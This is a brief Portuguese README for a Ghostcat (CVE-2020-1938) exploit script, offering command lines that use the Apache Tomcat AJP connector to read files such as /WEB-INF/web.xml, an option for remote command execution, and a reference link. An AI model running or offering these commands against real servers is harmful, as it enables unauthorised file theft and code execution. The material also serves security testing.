
Exploit para CVE-2020-1938 (Ghostcat) que permite leitura de arquivos e execução remota de comandos em servidores Apache Tomcat vulneráveis por meio do conector AJP.
python3 tomcat.py URL -f /WEB-INF/web.xml
exemplo:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1
Referência: https://www.t00ls.net/articles-55062.html